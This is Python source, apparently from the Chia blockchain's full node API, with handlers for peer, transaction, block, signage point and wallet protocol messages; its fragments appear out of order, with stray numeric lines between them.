addition_merkle_set.add_already_hashed(puzzle)
addition_merkle_set.add_already_hashed(hash_coin_list(coins))
assert addition_merkle_set.get_root() == block.foliage_transaction_block.additions_root
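# For each requested puzzle hash, return an inclusion proof for the puzzle hash and its
# coin-list hash, or an exclusion proof if no coins with that puzzle hash were added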
for puzzle_hash in request.puzzle_hashes:
result, proof = addition_merkle_set.is_included_already_hashed(puzzle_hash)
if puzzle_hash in puzzlehash_coins_map:
coins_map.append((puzzle_hash, puzzlehash_coins_map[puzzle_hash]))
hash_coin_str = hash_coin_list(puzzlehash_coins_map[puzzle_hash])
result_2, proof_2 = addition_merkle_set.is_included_already_hashed(hash_coin_str)
assert result
assert result_2
proofs_map.append((puzzle_hash, proof, proof_2))
else:
coins_map.append((puzzle_hash, []))
assert not result
proofs_map.append((puzzle_hash, proof, None))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_additions, response)
return msg
@api_request
async def request_removals(self, request: wallet_protocol.RequestRemovals) -> Optional[Message]:
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(request.header_hash)
# We lock so that the coin store does not get modified
peak_height = self.full_node.blockchain.get_peak_height()
if (
block is None
or block.is_transaction_block() is False
or block.height != request.height
or (peak_height is not None and block.height > peak_height)
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectRemovalsRequest(request.height, request.header_hash)
msg = make_msg(ProtocolMessageTypes.reject_removals_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return stale data if a reorg happens in the meantime
all_removals: List[CoinRecord] = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
all_removals_dict: Dict[bytes32, Coin] = {}
for coin_record in all_removals:
all_removals_dict[coin_record.coin.name()] = coin_record.coin
coins_map: List[Tuple[bytes32, Optional[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes]] = []
# If there are no transactions, respond with empty lists
if block.transactions_generator is None:
proofs: Optional[List]
if request.coin_names is None:
proofs = None
else:
proofs = []
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, [], proofs)
elif request.coin_names is None or len(request.coin_names) == 0:
for removed_name, removed_coin in all_removals_dict.items():
coins_map.append((removed_name, removed_coin))
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, None)
else:
assert block.transactions_generator
removal_merkle_set = MerkleSet()
for removed_name, removed_coin in all_removals_dict.items():
removal_merkle_set.add_already_hashed(removed_name)
assert removal_merkle_set.get_root() == block.foliage_transaction_block.removals_root
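# For each requested coin name, return an inclusion proof if it was spent in this block,
# or an exclusion proof otherwise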
for coin_name in request.coin_names:
result, proof = removal_merkle_set.is_included_already_hashed(coin_name)
proofs_map.append((coin_name, proof))
if coin_name in all_removals_dict:
removed_coin = all_removals_dict[coin_name]
coins_map.append((coin_name, removed_coin))
assert result
else:
coins_map.append((coin_name, None))
assert not result
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_removals, response)
return msg
@api_request
async def send_transaction(self, request: wallet_protocol.SendTransaction, *, test=False) -> Optional[Message]:
spend_name = request.transaction.name()
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(request.transaction, None, spend_name, None, test))
)
# Waits for the transaction to go into the mempool, times out after 45 seconds.
status, error = None, None
sleep_time = 0.01
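# Poll the shared transaction_responses list every 10 ms, for up to 45 seconds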
for i in range(int(45 / sleep_time)):
await asyncio.sleep(sleep_time)
for potential_name, potential_status, potential_error in self.full_node.transaction_responses:
if spend_name == potential_name:
status = potential_status
error = potential_error
break
if status is not None:
break
if status is None:
response = wallet_protocol.TransactionAck(spend_name, uint8(MempoolInclusionStatus.PENDING), None)
else:
error_name = error.name if error is not None else None
if status == MempoolInclusionStatus.SUCCESS:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
else:
# If it failed or is pending but previously succeeded (already in mempool), treat this as idempotent and return SUCCESS
if self.full_node.mempool_manager.get_spendbundle(spend_name) is not None:
response = wallet_protocol.TransactionAck(
spend_name, uint8(MempoolInclusionStatus.SUCCESS.value), None
)
else:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
msg = make_msg(ProtocolMessageTypes.transaction_ack, response)
return msg
@api_request
async def request_puzzle_solution(self, request: wallet_protocol.RequestPuzzleSolution) -> Optional[Message]:
coin_name = request.coin_name
height = request.height
coin_record = await self.full_node.coin_store.get_coin_record(coin_name)
reject = wallet_protocol.RejectPuzzleSolution(coin_name, height)
reject_msg = make_msg(ProtocolMessageTypes.reject_puzzle_solution, reject)
if coin_record is None or coin_record.spent_block_index != height:
return reject_msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(height)
if header_hash is None:
return reject_msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is None or block.transactions_generator is None:
return reject_msg
block_generator: Optional[BlockGenerator] = await self.full_node.blockchain.get_block_generator(block)
assert block_generator is not None
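# Re-run the block generator to extract the puzzle and solution for the requested coin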
error, puzzle, solution = get_puzzle_and_solution_for_coin(
block_generator, coin_name, self.full_node.constants.MAX_BLOCK_COST_CLVM
)
if error is not None:
return reject_msg
pz = Program.to(puzzle)
sol = Program.to(solution)
wrapper = PuzzleSolutionResponse(coin_name, height, pz, sol)
response = wallet_protocol.RespondPuzzleSolution(wrapper)
response_msg = make_msg(ProtocolMessageTypes.respond_puzzle_solution, response)
return response_msg
@api_request
async def request_header_blocks(self, request: wallet_protocol.RequestHeaderBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
return None
header_hashes: List[bytes32] = []
for i in range(request.start_height, request.end_height + 1):
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash is None:
reject = RejectHeaderBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_header_blocks, reject)
return msg
header_hashes.append(header_hash)
blocks: List[FullBlock] = await self.full_node.block_store.get_blocks_by_hash(header_hashes)
header_blocks = []
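# Pair each block with its non-coinbase additions and removal names to build the header block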
for block in blocks:
added_coins_records = await self.full_node.coin_store.get_coins_added_at_height(block.height)
removed_coins_records = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
added_coins = [record.coin for record in added_coins_records if not record.coinbase]
removal_names = [record.coin.name() for record in removed_coins_records]
header_block = get_block_header(block, added_coins, removal_names)
header_blocks.append(header_block)
msg = make_msg(
ProtocolMessageTypes.respond_header_blocks,
wallet_protocol.RespondHeaderBlocks(request.start_height, request.end_height, header_blocks),
)
return msg
@api_request
async def respond_compact_proof_of_time(self, request: timelord_protocol.RespondCompactProofOfTime):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_proof_of_time(request)
@execute_task
@peer_required
@api_request
@bytes_required
async def new_compact_vdf(
self, request: full_node_protocol.NewCompactVDF, peer: ws.WSChiaConnection, request_bytes: bytes = b""
):
if self.full_node.sync_store.get_sync_mode():
return None
if len(self.full_node.compact_vdf_sem._waiters) > 20:
self.log.debug(f"Ignoring NewCompactVDF: {request}, _waiters")
return
name = std_hash(request_bytes)
if name in self.full_node.compact_vdf_requests:
self.log.debug(f"Ignoring NewCompactVDF: {request}, already requested")
return
self.full_node.compact_vdf_requests.add(name)
# this semaphore only allows a limited number of tasks to call
# new_compact_vdf() at a time, since it can be expensive
async with self.full_node.compact_vdf_sem:
try:
await self.full_node.new_compact_vdf(request, peer)
finally:
self.full_node.compact_vdf_requests.remove(name)
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_compact_vdf])
async def request_compact_vdf(self, request: full_node_protocol.RequestCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.request_compact_vdf(request, peer)
@peer_required
@api_request
async def respond_compact_vdf(self, request: full_node_protocol.RespondCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_vdf(request, peer)
@peer_required
@api_request
async def register_interest_in_puzzle_hash(
self, request: wallet_protocol.RegisterForPhUpdates, peer: ws.WSChiaConnection
):
if peer.peer_node_id not in self.full_node.peer_puzzle_hash:
self.full_node.peer_puzzle_hash[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
hint_coin_ids = []
# Add peer to the "Subscribed" dictionary
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for puzzle_hash in request.puzzle_hashes:
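# Coins hinted with this puzzle hash are relevant to the wallet as well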
ph_hint_coins = await self.full_node.hint_store.get_coin_ids(puzzle_hash)
hint_coin_ids.extend(ph_hint_coins)
if puzzle_hash not in self.full_node.ph_subscriptions:
self.full_node.ph_subscriptions[puzzle_hash] = set()
if (
peer.peer_node_id not in self.full_node.ph_subscriptions[puzzle_hash]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.ph_subscriptions[puzzle_hash].add(peer.peer_node_id)
self.full_node.peer_puzzle_hash[peer.peer_node_id].add(puzzle_hash)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
# Send all coins with requested puzzle hash that have been created after the specified height
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_puzzle_hashes(
include_spent_coins=True, puzzle_hashes=request.puzzle_hashes, min_height=request.min_height
)
if len(hint_coin_ids) > 0:
hint_states = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=hint_coin_ids, min_height=request.min_height
)
states.extend(hint_states)
response = wallet_protocol.RespondToPhUpdates(request.puzzle_hashes, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_ph_update, response)
return msg
@peer_required
@api_request
async def register_interest_in_coin(
self, request: wallet_protocol.RegisterForCoinUpdates, peer: ws.WSChiaConnection
):
if peer.peer_node_id not in self.full_node.peer_coin_ids:
self.full_node.peer_coin_ids[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for coin_id in request.coin_ids:
if coin_id not in self.full_node.coin_subscriptions:
self.full_node.coin_subscriptions[coin_id] = set()
if (
peer.peer_node_id not in self.full_node.coin_subscriptions[coin_id]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.coin_subscriptions[coin_id].add(peer.peer_node_id)
self.full_node.peer_coin_ids[peer.peer_node_id].add(coin_id)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=request.coin_ids, min_height=request.min_height
)
response = wallet_protocol.RespondToCoinUpdates(request.coin_ids, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_coin_update, response)
return msg
@api_request
async def request_children(self, request: wallet_protocol.RequestChildren) -> Optional[Message]:
coin_records: List[CoinRecord] = await self.full_node.coin_store.get_coin_records_by_parent_ids(
True, [request.coin_name]
)
states = [record.coin_state for record in coin_records]
response = wallet_protocol.RespondChildren(states)
msg = make_msg(ProtocolMessageTypes.respond_children, response)
return msg
@api_request
async def request_ses_hashes(self, request: wallet_protocol.RequestSESInfo):
"""Returns the start and end height of a sub-epoch for the height specified in request"""
ses_height = self.full_node.blockchain.get_ses_heights()
start_height = request.start_height
end_height = request.end_height
ses_hash_heights = []
ses_reward_hashes = []
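# Scan consecutive sub-epoch boundaries for the span containing start_height,
# adding a second span if end_height falls in the next sub-epoch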
for idx, ses_start_height in enumerate(ses_height):
if idx == len(ses_height) - 1:
break
next_ses_height = ses_height[idx + 1]
# Find the sub-epoch span containing start_height
if ses_start_height <= start_height < next_ses_height:
ses_hash_heights.append([ses_start_height, next_ses_height])
ses: SubEpochSummary = self.full_node.blockchain.get_ses(ses_start_height)
ses_reward_hashes.append(ses.reward_chain_hash)
if ses_start_height < end_height < next_ses_height:
break
else:
if idx == len(ses_height) - 2:
break
# Otherwise add one extra sub-epoch span, since the requested start..end range crosses a sub-epoch boundary
next_next_height = ses_height[idx + 2]
ses_hash_heights.append([next_ses_height, next_next_height])
nex_ses: SubEpochSummary = self.full_node.blockchain.get_ses(next_ses_height)
ses_reward_hashes.append(nex_ses.reward_chain_hash)
break
response = RespondSESInfo(ses_reward_hashes, ses_hash_heights)
msg = make_msg(ProtocolMessageTypes.respond_ses_hashes, response)
return msg
| 47.811796
| 120
| 0.645049
|
import asyncio
import dataclasses
import time
import traceback
from secrets import token_bytes
from typing import Dict, List, Optional, Tuple, Set
from blspy import AugSchemeMPL, G2Element
from chiabip158 import PyBIP158
import chia.server.ws_connection as ws
from chia.consensus.block_creation import create_unfinished_block
from chia.consensus.block_record import BlockRecord
from chia.consensus.pot_iterations import calculate_ip_iters, calculate_iterations_quality, calculate_sp_iters
from chia.full_node.bundle_tools import best_solution_generator_from_template, simple_solution_generator
from chia.full_node.full_node import FullNode
from chia.full_node.mempool_check_conditions import get_puzzle_and_solution_for_coin
from chia.full_node.signage_point import SignagePoint
from chia.protocols import farmer_protocol, full_node_protocol, introducer_protocol, timelord_protocol, wallet_protocol
from chia.protocols.full_node_protocol import RejectBlock, RejectBlocks
from chia.protocols.protocol_message_types import ProtocolMessageTypes
from chia.protocols.wallet_protocol import (
PuzzleSolutionResponse,
RejectHeaderBlocks,
RejectHeaderRequest,
CoinState,
RespondSESInfo,
)
from chia.server.outbound_message import Message, make_msg
from chia.types.blockchain_format.coin import Coin, hash_coin_list
from chia.types.blockchain_format.pool_target import PoolTarget
from chia.types.blockchain_format.program import Program
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from chia.types.coin_record import CoinRecord
from chia.types.end_of_slot_bundle import EndOfSubSlotBundle
from chia.types.full_block import FullBlock
from chia.types.generator_types import BlockGenerator
from chia.types.mempool_inclusion_status import MempoolInclusionStatus
from chia.types.mempool_item import MempoolItem
from chia.types.peer_info import PeerInfo
from chia.types.transaction_queue_entry import TransactionQueueEntry
from chia.types.unfinished_block import UnfinishedBlock
from chia.util.api_decorators import api_request, peer_required, bytes_required, execute_task, reply_type
from chia.util.generator_tools import get_block_header
from chia.util.hash import std_hash
from chia.util.ints import uint8, uint32, uint64, uint128
from chia.util.merkle_set import MerkleSet
class FullNodeAPI:
full_node: FullNode
def __init__(self, full_node) -> None:
self.full_node = full_node
@property
def server(self):
return self.full_node.server
@property
def log(self):
return self.full_node.log
@property
def api_ready(self):
return self.full_node.initialized
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_peers])
async def request_peers(self, _request: full_node_protocol.RequestPeers, peer: ws.WSChiaConnection):
if peer.peer_server_port is None:
return None
peer_info = PeerInfo(peer.peer_host, peer.peer_server_port)
if self.full_node.full_node_peers is not None:
msg = await self.full_node.full_node_peers.request_peers(peer_info)
return msg
@peer_required
@api_request
async def respond_peers(
self, request: full_node_protocol.RespondPeers, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), True)
return None
@peer_required
@api_request
async def respond_peers_introducer(
self, request: introducer_protocol.RespondPeersIntroducer, peer: ws.WSChiaConnection
) -> Optional[Message]:
self.log.debug(f"Received {len(request.peer_list)} peers from introducer")
if self.full_node.full_node_peers is not None:
await self.full_node.full_node_peers.respond_peers(request, peer.get_peer_info(), False)
await peer.close()
return None
@execute_task
@peer_required
@api_request
async def new_peak(self, request: full_node_protocol.NewPeak, peer: ws.WSChiaConnection) -> Optional[Message]:
waiter_count = len(self.full_node.new_peak_sem._waiters)
if waiter_count > 0:
self.full_node.log.debug(f"new_peak Waiters: {waiter_count}")
if waiter_count > 20:
return None
async with self.full_node.new_peak_sem:
return await self.full_node.new_peak(request, peer)
@peer_required
@api_request
async def new_transaction(
self, transaction: full_node_protocol.NewTransaction, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if not (await self.full_node.synced()):
return None
if self.full_node.mempool_manager.seen(transaction.transaction_id):
return None
if self.full_node.mempool_manager.is_fee_enough(transaction.fees, transaction.cost):
if transaction.transaction_id in self.full_node.full_node_store.pending_tx_request:
if transaction.transaction_id in self.full_node.full_node_store.peers_with_tx:
current_set = self.full_node.full_node_store.peers_with_tx[transaction.transaction_id]
if peer.peer_node_id in current_set:
return None
current_set.add(peer.peer_node_id)
return None
else:
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
return None
self.full_node.full_node_store.pending_tx_request[transaction.transaction_id] = peer.peer_node_id
new_set = set()
new_set.add(peer.peer_node_id)
self.full_node.full_node_store.peers_with_tx[transaction.transaction_id] = new_set
async def tx_request_and_timeout(full_node: FullNode, transaction_id, task_id):
counter = 0
try:
while True:
# Limit to asking to a few peers, it's possible that this tx got included on chain already
# drop some transactions, we don't want to refetch too many times
if counter == 5:
break
if transaction_id not in full_node.full_node_store.peers_with_tx:
break
peers_with_tx: Set = full_node.full_node_store.peers_with_tx[transaction_id]
if len(peers_with_tx) == 0:
break
peer_id = peers_with_tx.pop()
assert full_node.server is not None
if peer_id not in full_node.server.all_connections:
continue
peer = full_node.server.all_connections[peer_id]
request_tx = full_node_protocol.RequestTransaction(transaction.transaction_id)
msg = make_msg(ProtocolMessageTypes.request_transaction, request_tx)
await peer.send_message(msg)
await asyncio.sleep(5)
counter += 1
if full_node.mempool_manager.seen(transaction_id):
break
except asyncio.CancelledError:
pass
finally:
if transaction_id in full_node.full_node_store.peers_with_tx:
full_node.full_node_store.peers_with_tx.pop(transaction_id)
if transaction_id in full_node.full_node_store.pending_tx_request:
full_node.full_node_store.pending_tx_request.pop(transaction_id)
if task_id in full_node.full_node_store.tx_fetch_tasks:
full_node.full_node_store.tx_fetch_tasks.pop(task_id)
task_id: bytes32 = bytes32(token_bytes(32))
fetch_task = asyncio.create_task(
tx_request_and_timeout(self.full_node, transaction.transaction_id, task_id)
)
self.full_node.full_node_store.tx_fetch_tasks[task_id] = fetch_task
return None
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_transaction])
async def request_transaction(self, request: full_node_protocol.RequestTransaction) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
spend_bundle = self.full_node.mempool_manager.get_spendbundle(request.transaction_id)
if spend_bundle is None:
return None
transaction = full_node_protocol.RespondTransaction(spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
return msg
@peer_required
@api_request
@bytes_required
async def respond_transaction(
self,
tx: full_node_protocol.RespondTransaction,
peer: ws.WSChiaConnection,
tx_bytes: bytes = b"",
test: bool = False,
) -> Optional[Message]:
assert tx_bytes != b""
spend_name = std_hash(tx_bytes)
if spend_name in self.full_node.full_node_store.pending_tx_request:
self.full_node.full_node_store.pending_tx_request.pop(spend_name)
if spend_name in self.full_node.full_node_store.peers_with_tx:
self.full_node.full_node_store.peers_with_tx.pop(spend_name)
if self.full_node.transaction_queue.qsize() % 100 == 0 and not self.full_node.transaction_queue.empty():
self.full_node.log.debug(f"respond_transaction Waiters: {self.full_node.transaction_queue.qsize()}")
if self.full_node.transaction_queue.full():
self.full_node.dropped_tx.add(spend_name)
return None
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(tx.transaction, tx_bytes, spend_name, peer, test))
)
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_proof_of_weight])
async def request_proof_of_weight(self, request: full_node_protocol.RequestProofOfWeight) -> Optional[Message]:
if self.full_node.weight_proof_handler is None:
return None
if not self.full_node.blockchain.contains_block(request.tip):
self.log.error(f"got weight proof request for unknown peak {request.tip}")
return None
if request.tip in self.full_node.pow_creation:
event = self.full_node.pow_creation[request.tip]
await event.wait()
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
else:
event = asyncio.Event()
self.full_node.pow_creation[request.tip] = event
wp = await self.full_node.weight_proof_handler.get_proof_of_weight(request.tip)
event.set()
tips = list(self.full_node.pow_creation.keys())
if len(tips) > 4:
for i in range(0, 4):
self.full_node.pow_creation.pop(tips[i])
if wp is None:
self.log.error(f"failed creating weight proof for peak {request.tip}")
return None
if (
self.full_node.full_node_store.serialized_wp_message_tip is not None
and self.full_node.full_node_store.serialized_wp_message_tip == request.tip
):
return self.full_node.full_node_store.serialized_wp_message
message = make_msg(
ProtocolMessageTypes.respond_proof_of_weight, full_node_protocol.RespondProofOfWeight(wp, request.tip)
)
self.full_node.full_node_store.serialized_wp_message_tip = request.tip
self.full_node.full_node_store.serialized_wp_message = message
return message
@api_request
async def respond_proof_of_weight(self, request: full_node_protocol.RespondProofOfWeight) -> Optional[Message]:
self.log.warning("Received proof of weight too late.")
return None
@api_request
@reply_type([ProtocolMessageTypes.respond_block, ProtocolMessageTypes.reject_block])
async def request_block(self, request: full_node_protocol.RequestBlock) -> Optional[Message]:
if not self.full_node.blockchain.contains_height(request.height):
reject = RejectBlock(request.height)
msg = make_msg(ProtocolMessageTypes.reject_block, reject)
return msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
if not request.include_transaction_block and block.transactions_generator is not None:
block = dataclasses.replace(block, transactions_generator=None)
return make_msg(ProtocolMessageTypes.respond_block, full_node_protocol.RespondBlock(block))
return make_msg(ProtocolMessageTypes.reject_block, RejectBlock(request.height))
@api_request
@reply_type([ProtocolMessageTypes.respond_blocks, ProtocolMessageTypes.reject_blocks])
async def request_blocks(self, request: full_node_protocol.RequestBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
reject = RejectBlocks(request.start_height, request.end_height)
msg: Message = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
for i in range(request.start_height, request.end_height + 1):
if not self.full_node.blockchain.contains_height(uint32(i)):
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
if not request.include_transaction_block:
blocks: List[FullBlock] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash_i)
if block is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block = dataclasses.replace(block, transactions_generator=None)
blocks.append(block)
msg = make_msg(
ProtocolMessageTypes.respond_blocks,
full_node_protocol.RespondBlocks(request.start_height, request.end_height, blocks),
)
else:
blocks_bytes: List[bytes] = []
for i in range(request.start_height, request.end_height + 1):
header_hash_i = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash_i is None:
reject = RejectBlocks(request.start_height, request.end_height)
return make_msg(ProtocolMessageTypes.reject_blocks, reject)
block_bytes: Optional[bytes] = await self.full_node.block_store.get_full_block_bytes(header_hash_i)
if block_bytes is None:
reject = RejectBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_blocks, reject)
return msg
blocks_bytes.append(block_bytes)
respond_blocks_manually_streamed: bytes = (
bytes(uint32(request.start_height))
+ bytes(uint32(request.end_height))
+ len(blocks_bytes).to_bytes(4, "big", signed=False)
)
for block_bytes in blocks_bytes:
respond_blocks_manually_streamed += block_bytes
msg = make_msg(ProtocolMessageTypes.respond_blocks, respond_blocks_manually_streamed)
return msg
@api_request
async def reject_block(self, request: full_node_protocol.RejectBlock):
self.log.debug(f"reject_block {request.height}")
@api_request
async def reject_blocks(self, request: full_node_protocol.RejectBlocks):
self.log.debug(f"reject_blocks {request.start_height} {request.end_height}")
@api_request
async def respond_blocks(self, request: full_node_protocol.RespondBlocks) -> None:
self.log.warning("Received unsolicited/late blocks")
return None
@api_request
@peer_required
async def respond_block(
self,
respond_block: full_node_protocol.RespondBlock,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
self.log.warning(f"Received unsolicited/late block from peer {peer.get_peer_logging()}")
return None
@api_request
async def new_unfinished_block(
self, new_unfinished_block: full_node_protocol.NewUnfinishedBlock
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
block_hash = new_unfinished_block.unfinished_reward_hash
if self.full_node.full_node_store.get_unfinished_block(block_hash) is not None:
return None
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
return None
msg = make_msg(
ProtocolMessageTypes.request_unfinished_block,
full_node_protocol.RequestUnfinishedBlock(block_hash),
)
self.full_node.full_node_store.requesting_unfinished_blocks.add(block_hash)
async def eventually_clear():
await asyncio.sleep(5)
if block_hash in self.full_node.full_node_store.requesting_unfinished_blocks:
self.full_node.full_node_store.requesting_unfinished_blocks.remove(block_hash)
asyncio.create_task(eventually_clear())
return msg
@api_request
@reply_type([ProtocolMessageTypes.respond_unfinished_block])
async def request_unfinished_block(
self, request_unfinished_block: full_node_protocol.RequestUnfinishedBlock
) -> Optional[Message]:
unfinished_block: Optional[UnfinishedBlock] = self.full_node.full_node_store.get_unfinished_block(
request_unfinished_block.unfinished_reward_hash
)
if unfinished_block is not None:
msg = make_msg(
ProtocolMessageTypes.respond_unfinished_block,
full_node_protocol.RespondUnfinishedBlock(unfinished_block),
)
return msg
return None
@peer_required
@api_request
@bytes_required
async def respond_unfinished_block(
self,
respond_unfinished_block: full_node_protocol.RespondUnfinishedBlock,
peer: ws.WSChiaConnection,
respond_unfinished_block_bytes: bytes = b"",
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_unfinished_block(
respond_unfinished_block, peer, block_bytes=respond_unfinished_block_bytes
)
return None
@api_request
@peer_required
async def new_signage_point_or_end_of_sub_slot(
self, new_sp: full_node_protocol.NewSignagePointOrEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_signage_point_by_index(
new_sp.challenge_hash,
new_sp.index_from_challenge,
new_sp.last_rc_infusion,
)
is not None
):
return None
if self.full_node.full_node_store.have_newer_signage_point(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
):
return None
if new_sp.index_from_challenge == 0 and new_sp.prev_challenge_hash is not None:
if self.full_node.full_node_store.get_sub_slot(new_sp.prev_challenge_hash) is None:
collected_eos = []
challenge_hash_to_request = new_sp.challenge_hash
last_rc = new_sp.last_rc_infusion
num_non_empty_sub_slots_seen = 0
for _ in range(30):
if num_non_empty_sub_slots_seen >= 3:
self.log.debug("Diverged from peer. Don't have the same blocks")
return None
# If this is an end of sub slot, and we don't have the prev, request the prev instead
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
challenge_hash_to_request, uint8(0), last_rc
)
response = await peer.request_signage_point_or_end_of_sub_slot(full_node_request, timeout=10)
if not isinstance(response, full_node_protocol.RespondEndOfSubSlot):
self.full_node.log.debug(f"Invalid response for slot {response}")
return None
collected_eos.append(response)
if (
self.full_node.full_node_store.get_sub_slot(
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
is not None
or response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
== self.full_node.constants.GENESIS_CHALLENGE
):
for eos in reversed(collected_eos):
await self.respond_end_of_sub_slot(eos, peer)
return None
if (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.number_of_iterations
!= response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.number_of_iterations
):
num_non_empty_sub_slots_seen += 1
challenge_hash_to_request = (
response.end_of_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge
)
last_rc = response.end_of_slot_bundle.reward_chain.end_of_slot_vdf.challenge
self.full_node.log.warning("Failed to catch up in sub-slots")
return None
if new_sp.index_from_challenge > 0:
if (
new_sp.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE
and self.full_node.full_node_store.get_sub_slot(new_sp.challenge_hash) is None
):
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, uint8(0), new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
# Otherwise (we have the prev or the end of sub slot), request it normally
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
@api_request
@reply_type([ProtocolMessageTypes.respond_signage_point, ProtocolMessageTypes.respond_end_of_sub_slot])
async def request_signage_point_or_end_of_sub_slot(
self, request: full_node_protocol.RequestSignagePointOrEndOfSubSlot
) -> Optional[Message]:
if request.index_from_challenge == 0:
sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = self.full_node.full_node_store.get_sub_slot(
request.challenge_hash
)
if sub_slot is not None:
return make_msg(
ProtocolMessageTypes.respond_end_of_sub_slot,
full_node_protocol.RespondEndOfSubSlot(sub_slot[0]),
)
else:
if self.full_node.full_node_store.get_sub_slot(request.challenge_hash) is None:
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
self.log.info(f"Don't have challenge hash {request.challenge_hash}")
